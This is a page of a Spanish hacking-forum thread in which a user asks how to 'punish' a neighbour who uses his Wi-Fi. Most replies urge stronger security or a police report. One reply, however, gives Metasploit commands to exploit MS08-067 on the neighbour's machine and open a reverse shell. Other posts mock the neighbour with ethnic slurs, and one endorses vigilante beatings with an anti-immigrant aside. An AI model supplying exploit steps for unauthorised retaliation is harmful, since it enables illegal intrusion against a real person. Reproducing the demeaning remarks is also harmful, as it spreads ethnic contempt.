elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Castigar a un intruso
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: Castigar a un intruso  (Leído 18,472 veces)
Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: Castigar a un intruso
« Respuesta #20 en: 25 Junio 2010, 16:03 pm »

Si de veras tienes pruebas de que ha cometido un delito, lo primero refuerza la seguridad de tu red, con WPA, filtrado de macs...
Y lo segundo, guarda LOGs para poder denunciarle ante la policia, y que la ley haga el resto.


Saludos
En línea

simorg
Ex-Staff
*
Desconectado Desconectado

Mensajes: 8.301



Ver Perfil
Re: Castigar a un intruso
« Respuesta #21 en: 25 Junio 2010, 16:12 pm »

Mmmmm, Ojo x ojo...y todos tuertos. ¿No te vale ponerte tú filtrado MAC en tu ruter ?  Y se acabó el problema.

Vale, para finalizar despues de este hazaroso hilo me cito a mi mismo, y no estaria demás que se pasara algun Mod. y diera por cerrado el tema.

Citar
El próximo miércoles se publicará en el Boletín Oficial del Estado la reforma del Código Penal, en la que se recogerá la posibilidad de imponer entre seis y dos años de cárcel por el delito de intromisión en sistemas informáticos ajenos, aunque de ello no se deriven “daños o lesiones”.
(La cita es de wolfbcn, de hoy mismo.)

Salu2.
« Última modificación: 25 Junio 2010, 16:25 pm por simorg » En línea

177600531

Desconectado Desconectado

Mensajes: 134


Forever in Darkness


Ver Perfil
Re: Castigar a un intruso
« Respuesta #22 en: 25 Junio 2010, 16:27 pm »

Mmmmm, Ojo x ojo...y todos tuertos. ¿No te vale ponerte tú filtrado MAC en tu ruter ?  Y se acabó el problema.

Vale, para finalizar despues de este hazaroso hilo me cito a mi mismo, y no estaria demás que se pasara algun Mod. y diera por cerrado el tema.

Citar
El próximo miércoles se publicará en el Boletín Oficial del Estado la reforma del Código Penal, en la que se recogerá la posibilidad de imponer entre seis y dos años de cárcel por el delito de intromisión en sistemas informáticos ajenos, aunque de ello no se deriven “daños o lesiones”.

Salu2.

Seguramente el chino ira y denunciara al chico por haberle accedido a la compu porque él se conecta a redes ajenas xD.
Hola me llamo Chino Amarillo y he venido a denunciar que me han jodido la compu por joder yo redes. :xD
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: Castigar a un intruso
« Respuesta #23 en: 25 Junio 2010, 16:29 pm »

Mmmmm, Ojo x ojo...y todos tuertos. ¿No te vale ponerte tú filtrado MAC en tu ruter ?  Y se acabó el problema.

Vale, para finalizar despues de este hazaroso hilo me cito a mi mismo, y no estaria demás que se pasara algun Mod. y diera por cerrado el tema.

Citar
El próximo miércoles se publicará en el Boletín Oficial del Estado la reforma del Código Penal, en la que se recogerá la posibilidad de imponer entre seis y dos años de cárcel por el delito de intromisión en sistemas informáticos ajenos, aunque de ello no se deriven “daños o lesiones”.

Salu2.

Seguramente el chino ira y denunciara al chico por haberle accedido a la compu porque él se conecta a redes ajenas xD.
Hola me llamo Chino Amarillo y he venido a denunciar que me han jodido la compu por joder yo redes. :xD
Seria digno de ver xD

Saludos
En línea

ucry77

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: Castigar a un intruso
« Respuesta #24 en: 25 Junio 2010, 16:34 pm »

por los datos que me salen con airodump incluso con la claveWPA que puse el sigue intentando conectarse imagino que tiene mejor señal con mi red que con otros. Creo que voy dejar  la clave WEP nueva y ya veremos que hara colega, lo de denunciar no lo veo bien con la ley que ay y etc.
proxi_crack me puedes giar un poco con el tema de metsploit o algunos enlases ...
por fa
En línea

177600531

Desconectado Desconectado

Mensajes: 134


Forever in Darkness


Ver Perfil
Re: Castigar a un intruso
« Respuesta #25 en: 25 Junio 2010, 16:50 pm »

Dijiste que tenía el puerto 445 abierto pues abre la consola de el metasploit y prueba con el ms08_067_netapi

Te dejo los comandos:

Código:
use windows/smb/ms08_067_netapi

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.x.x tu ip local

set RHOST 192.168.x.x ip local chino

exploit

Y si tienes suerte tendrás una Shell inversa. Suerte.
En línea

dani__

Desconectado Desconectado

Mensajes: 126


Always learning...


Ver Perfil
Re: Castigar a un intruso
« Respuesta #26 en: 25 Junio 2010, 16:53 pm »

Lo suyo seria denegar su mac, pero si tiene minimos conocimientos para sacar una contraseña sabe cambiar su mac.

Pero tu no puedes meterle un filtrado mac a cualquiera porque le puedes joder fastidiar mucho mas que el vecino conectandose.

Lo mas seguro es que alguno de los vecinos a los que le has puesto el filtrado mac tengan otro ordenador que cuando tu lo configuraste no estaba conectado y por tanto lo as dejado fuera de la red.

La intencion ha sido buena pero la seguridad siempre conlleva mas configuraciones y necesitas tener conociemientos para ello (mi opinion)

Si de verdad estas interesado en ayudar a tus vecinos, pon un cartel en el portal o meteles una carta en el buzon: he detectado que el chino de abajo se esta aprovechando de nuestras redes wifi, si alguien quiere que le cambie la contraseña por otra mas segura que me llame al piso... tardo 5min y navegaras mas rapido.
En línea

wACtOr


Desconectado Desconectado

Mensajes: 461


Premio finalista diseño web elhacker.net


Ver Perfil
Re: Castigar a un intruso
« Respuesta #27 en: 25 Junio 2010, 16:56 pm »

weno yo no queria entrar al trapo, pero solo quiero decir una cosa.

tanto por parte del chino, como por parte de ucryy77, ambos 2 an cometido un delito.

ami me parece bien que ucry quiera saber como entrar en otra pc. sin embargo la formula de la pregunta no es la correcta ya que como dice paciencia no se da soporte para joder al vecino. pero por ejemplo si que se da soporte de como penetrar en tu maquina virtual para hacer pruebas.


y luego tamien quiero decir una cosa. si estas en tu casa trankilamente a las 2 am viendo una peli y ves que te entra un tipo en tu casa con intencion de robarte, no intentarias hacer nada para defenderte o defender tus cosas?. o me vas a decir que entra el pollo en tu casa y tu cojes y llamas a la policia delante de el dicendole, no tio espera que e llamao a los guardias para que te lleve al calabozo una noche, te pongan una multa de 500 pavos por allanamiento de morada y vuelvas a salir, me visitas en mi casa y me das una paliza.??

sinceramente yo si puedo intentar darle una paliza al caco se la intentare dar, y si consigo reducirlo, despues llamo a los guardias , pero primero le quito las ganas de volver a entrar en una casa ajena. Posiblemente, en este hipotetico caso, acabaria yo denunciado por agresion y el otro tipo (si fuera inmigrante) saldria felizmente por la puerta. si la ley fuera de otra manera se arian las cosas de otra manera, pero como no lo son, prefiero cuidarme mi propio culo a que me lo cuide mi pais.


Seguramente a alguno no le gustara esto que escribo. pero realmente es asi..

Un saludo.

En línea

ucry77

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: Castigar a un intruso
« Respuesta #28 en: 25 Junio 2010, 17:18 pm »

ok y si nos centramos en la maquina virtual o otro equipo que tengo en mi red , que es mio , y en que puedo ejecutar XP o Wind 7 o BT4 o UBUNTU
En línea

simorg
Ex-Staff
*
Desconectado Desconectado

Mensajes: 8.301



Ver Perfil
Re: Castigar a un intruso
« Respuesta #29 en: 25 Junio 2010, 17:21 pm »

De buen rollo el Chino se lo podia montar tal que así:

En línea

Páginas: 1 2 [3] 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Cruz Roja quiere castigar a los jugadores que cometan crímenes de guerra ....
Noticias
wolfbcn 0 1,556 Último mensaje 3 Octubre 2013, 02:30 am
por wolfbcn
La ley impide al Gobierno castigar el odio en Twitter
Noticias
wolfbcn 0 1,087 Último mensaje 23 Mayo 2014, 01:26 am
por wolfbcn
Reddit comenzará a castigar a sus usuarios y comunidades más tóxicas
Noticias
wolfbcn 0 1,417 Último mensaje 2 Diciembre 2016, 02:05 am
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines